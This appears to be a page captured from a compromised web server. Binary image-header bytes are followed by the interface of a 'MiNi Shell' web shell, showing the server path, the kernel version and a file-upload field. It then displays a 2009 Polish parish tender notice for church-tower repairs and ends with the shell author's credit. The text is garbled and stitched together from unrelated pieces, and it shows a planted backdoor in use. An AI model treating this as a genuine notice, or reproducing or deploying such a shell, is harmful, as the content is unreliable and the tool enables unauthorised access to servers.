JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090802/262990-N-2009.html

<p class="kh_header"><b>Lubieszewo: Remont ratowniczy drewnianej części wieży kościoła p.w.  Św. Elżbiety w Lubieszewie.</b><br>
<b>Numer ogłoszenia: 262990 - 2009; data zamieszczenia: 02.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Parafia Rzymskokatolicka św. Elżbiety , Lubieszewo 5A, 82-100 Lubieszewo, woj. pomorskie, tel. 0-55 247 48 51, faks 0-55 247 48 51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubieszewo.elblag.opoka.org.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Parafia.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont ratowniczy drewnianej części wieży kościoła p.w.  Św. Elżbiety w Lubieszewie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac obejmować będzie wykonanie robót w branży budowlano-konserwatorskiej.

Planowane roboty mają na celu doprowadzenie do właściwego standardu technicznego i estetycznego  wieży kościoła. 

2.  Przedmiot zamówienia określa dokumentacja projektowa składająca się z dokumentów :
	
	
1. SIWZ z załącznikami
2. Projekt budowlany 
3. Decyzja WUOZ w Gdańsku                                                        
4. Książka przedmiarów 
5. Fotografie


2.1 uwagi dodatkowe.

Program robót remontowo-konserwatorskich uzyskał akceptacją WUOZ w Gdańsku.

Roboty budowlano-konserwatorskie prowadzone będą w oparciu o decyzję o   pozwoleniu na budowę  wydane  przez Starostwo Powiatowe w Nowym   
Dworze  Gdańskim.

Wartość zamówienia jest ryczałtowa określona w oparciu o załączony przedmiar.

Płatność za usługę -na podstawie faktury końcowej, po komisyjnym odbiorze prac przez komisję konserwatorską z udziałem Inspektora Nadzoru WUOZ Gdańsk.

Załącznikiem do umowy będzie harmonogram prac ustalony po podpisaniu umowy i obowiązujący wykonawcę, którego niedotrzymywanie może być podstawą do zerwania umowy.

Wykonawca zapewni stały, wewnętrzny nadzór konserwatorski nad prowadzonymi pracami przez osobę posiadającą stosowne uprawnienia. Na czas nieobecności osoby sprawującej nadzór konserwatorski na miejscu prowadzonych prac, prace te zostaną wstrzymane.

Zamawiający oczekuje maksymalnie wysokich standardów przeprowadzonych prac. Nie dopuszcza się stosowania materiałów zastępczych o parametrach niższych od przewidzianych w specyfikacji, programie robót i zaakceptowanych przez komisję konserwatorską. 

Ze względu na fakt, iż roboty finansowane są z dotacji, Zamawiający nie przewiduje wypłacenia części lub całości kosztów poniesionych przez Wykonawcę na realizację zamówienia, w przypadku zerwania umowy  z winy Wykonawcy, jakie nastąpić może w przypadku odstąpienia przez Wykonawcę od warunków realizacji zamówienia, określonych w SIWZ lub w umowie.
W przypadku zwiększenia zakresu robót zamawiający nie przewiduje zwiększenia środków przeznaczonych na wynagrodzenie  wykonawcy, w przypadku zmniejszenia zakresu wynagrodzenie ulegnie odpowiednio zmniejszeniu. 

Wykonawca wykona roboty budowlano - konserwatorskie zgodnie z dokumentacją oraz zawartą umową, uwzględniając bieżące uwagi nadzoru inwestorskiego.  

Zakres niezbędnych badań  i ekspertyz określony zostanie przed i w trakcie prac, koszty ponosi wykonawca.

3. Ponadto roboty należy wykonywać w sposób gwarantujący spełnienie warunków:
 
a)	Ustawa z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami ( Dz. U. z 2003 r. nr 162, poz.1568 i Rozporządzenie Ministra Kultury z dnia 9 czerwca 2004, 

b)	Ustawa z dnia 7 lipca 1994 r Prawo Budowlane (t.j. Dz. U. z 2006r. nr 156, poz. 1118, z późn. zm.) 

c)	 Rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. nr 75 poz.690, z późn. zm.), 

d)	Aktualnych Polskich Norm i norm branżowych, 

e)	Właściwych przepisów bhp i ppoż. 

4. Wszystkie materiały użyte do wykonania przedmiotu zamówienia powinny posiadać stosowne atesty i certyfikaty dopuszczające je do stosowania w budownictwie i pracach konserwatorskich oraz być zgodne z ustaleniami komisji.

5. Wykonawca będzie zobowiązany do realizacji robót w taki sposób, aby nie zakłócać funkcjonowania obiektu jako miejsca kultu religijnego. W tym celu Wykonawca sporządzi harmonogram robót i plan organizacji, uwzględniający wymogi określone we wzorze umowy . Roboty mogą być wykonywane w dni ustawowo wolne od pracy, oprócz niedzieli i świąt kościelnych.

6. Wykonawca zapewni gwarancję na wykonane roboty na okres co najmniej 36 miesięcy od daty podpisania protokołu odbioru końcowego. 

7. Ze względu na fakt, iż w odniesieniu do niniejszego zamówienia mają zastosowanie przepisy kodeksu cywilnego dotyczące umowy o roboty budowlane, a w szczególności art. 647 1 kc, który reguluje m.in. ponoszenie solidarnej odpowiedzialności Zamawiającego i Wykonawcy za zapłatę wynagrodzenia za roboty budowlane wykonane przez podwykonawcę -  Wykonawca nie może zlecić wykonania całości robót objętych umową do wykonania innym wykonawcom. Specyfika prac - prace prowadzone będą przy obiekcie zabytkowym, objętym ochroną prawną, wymagającą od wszystkich wykonawców stosownych uprawnień do prowadzenia prac.
Wykonawca może podzlecić jedynie wykonanie specjalistycznych badań, jakie uzna za stosowne, wyspecjalizowanej jednostce badawczej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium w wysokości  8.800 PLN
na konto parafii -    42 8306 0003 0002 8394 2000 0010<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W przetargu mogą wziąć udział wykonawcy, którzy: 

1) spełniają wymagania określone w  ustawach mających zastosowanie.

a) Wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenia zamówienia co najmniej  sześciu prac : pięciu robót o  wartości o  co najmniej  300 000 każda przy budynkach wpisanych do rejestru zabytków,  w zakres których wchodziły remonty drewnianych konstrukcji więźb dachowych oraz najmniej jednej roboty przy pokryciu gontowym na obiektach wpisanych do rejestru zabytków.  

b) Obiekt  objęty jest ochroną konserwatorską  więc Zamawiający wymaga:

b.1. Wskazanie osoby do pełnienia funkcji kierownika budowy winna posiadać odpowiednie przygotowanie ( kwalifikacje) i doświadczenie, wynikające z przepisów Ustawy z dnia 7 lipca 1994r. - Prawo budowlane ( Dz.U. z 2003 r. nr 207, poz. 2016 z późn. zm.) oraz określone w Ustawie z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami ( Dz. U. z 2003 r. nr 162, poz.1568 i Rozporządzenie Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. z 2004 r. Ne 150, poz. 1579). Kierownik robót budowlanych winien mieć doświadczenie w pracach budowlanych, w zakres których wchodziły remonty drewnianych konstrukcji dachów oraz najmniej jedna robota przy pokryciu gontowym na obiektach wpisanych do rejestru zabytków.  

b.2.Wskazanie osoby : konserwatora detalu i elementu architektonicznego,  który będzie uczestniczyć  w realizacji zamówienia. 
Osoba pełniąca nadzór, w ramach przedmiotu zamówienia, winna posiadać odpowiednie przygotowanie ( kwalifikacje) i doświadczenie, określone w Ustawie z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami ( Dz. U. z 2003 r. nr 162, poz.1568 i Rozporządzenie Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia spraw konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. z 2004 r. Ne 150, poz. 1579) 
oraz doświadczenie w pracach przy murach ceglanych i konstrukcjach drewnianych

b.3. Pracownicy wskazani i zatrudniani przez Wykonawcę, winni mieć poświadczoną praktykę w pracach przy obiektach zabytkowych wpisanych do rejestru zabytków.

3) Posiadają środki finansowe na realizację zamówienia w wysokości nie    
mniejszej niż 300.000,00 zł lub zdolność kredytową nie mniejszą niż 300.000,00 zł

4) Posiadają  aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności  gospodarczej na kwotę nie niższą niż równowartość  1 mln

5) nie podlegają wykluczeniu z postępowania na mocy art. 24 ust. 1 i 2 ustawy. 

2. Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie dokumentów i oświadczeń, przedłożonych przez wykonawcę wraz z ofertą i wyszczególnionych w § 5, na zasadzie kwalifikacji :spełnia-nie spełnia. 

3. W przypadku wykonawców występujących wspólnie warunki określone w ust. 1 pkt. b musi spełnić każdy z wykonawców (dokumenty wskazane w § 5 ust. 1 pkt. 1 i 2 SIWZ składa każdy z wykonawców występujących wspólnie we własnym imieniu), warunki wskazane w ust. 1 pkt. 1 nie mogą być spełnione łącznie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty wymagane od wykonawców w celu potwierdzenia spełniania warunków udziału w postępowaniu. 

1. Wykonawca składa wraz z ofertą następujące dokumenty: 

1) oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu- wg. wzoru na załączniku nr 2 do SIWZ; 
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wykazujące prowadzenie działalności objętej przedmiotem zamówienia, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 

3) wykaz wykonanych w okresie ostatnich pięciu lat, przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  sześciu prac : pięciu robót o  wartości o  co najmniej  300 000,00 zł każda przy budynkach wpisanych do rejestru zabytków, w zakres których wchodziły remonty drewnianych konstrukcji więźb oraz najmniej jednej roboty przy pokryciu gontowym na obiektach wpisanych do rejestru zabytków,  z podaniem ich przedmiotu, wartości, daty i miejsca wykonania, wg. wzoru na załączniku nr 3 do SIWZ, z załączeniem dokumentów potwierdzających, że zostały one wykonane należycie i potwierdzeniem wysokości kwot.

4) Wykaz osób którymi dysponuje lub będzie dysponował Wykonawca (wg wzoru na 
załączniku nr 4 do SIWZ)

4.1 wraz z decyzją o nadaniu uprawnień do kierowania robotami budowlanymi, lub decyzją o stwierdzeniu przygotowania zawodowego upoważniającą do wykonywania samodzielnej funkcji kierownika budowy, w specjalności konstrukcyjno- budowlanej 
poświadczenia  praktyki zawodowej w kierowaniu pracami przy obiektach wpisanych do rejestru zabytków nieruchomych wraz wykazem prac , w zakres których wchodziły remonty drewnianych konstrukcji więźb oraz najmniej jednej roboty przy pokryciu gontowym na obiektach wpisanych do rejestru zabytków i oświadczeniem o przyjęciu obowiązków kierownika budowy.

4.2 wraz z kserokopiami dokumentów potwierdzających uprawnienia do nadzorowania prac konserwatorskich, wskazanej osoby wraz z wykazem prac przy obiektach wpisanych do rejestru zabytków nieruchomych z uwzględnieniem prac przy murach ceglanych i konstrukcjach drewnianych oraz oświadczeniem o przyjęciu obowiązków wewnętrznego nadzoru konserwatorskiego. 

5) Załączenie informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych nie mniejszą niż 300.000,00 zł lub zdolność kredytową, nie mniejszą niż 300.000,00 zł., wystawionej nie wcześniej niż  3 miesiące przed upływem terminu składania ofert. 

6) Poświadczenie  posiadania  aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 1 mln zł.

7) Pisemne zobowiązanie/zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 4, Wykonawca wskazał osoby, którymi będzie dysponował w przypadku stałego zatrudnienia ich przez inne podmioty  oraz oświadczenia osób nie będących związanymi umowami z żadnym podmiotem a mającymi uczestniczyć w realizacji zamówienia o dyspozycyjności wobec Wykonawcy na czas realizacji zlecenia.

8)  Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków,  opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania  decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2. Dokumenty sporządzone w języku obcym będą składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. 

3. Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu będą składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu , gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. 

4. Dokumenty składane przez wykonawców zagranicznych. 
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej: 
1) zamiast dokumentów, o których mowa w § 5 ust. 1 pkt. 2, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
 
5. Dokumenty, o których mowa w ust. 4 pkt 1 lit. a i b powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

6. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 4, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Do aktualności tego dokumentu mają odpowiednie zastosowanie zapisy ust. 5.

7.Dowód przelewu wadium na konto parafii.    42 8306 0003 0002 8394 2000 0010.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lubieszewo.elblag.opoka.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W biurze Parafii kościoła  w Lubieszewie 5A , 82-100 Nowy Dwór Gdański po kontakcie
telefonicznym - nr kom.508 506 554   od poniedziałku do piątku,w godz. 11 - 14 .00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2009 godzina 12:00, miejsce: W biurze Parafii kościoła  w Lubieszewie 5A , 82-100 Nowy Dwór Gdański.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawcy mogą kontaktować się telefonicznie w celu ustalenia terminu wizji lokalnej pod nr kom.508 506 554   od poniedziałku do piątku,

Creat By MiNi SheLL
Email: jattceo@gmail.com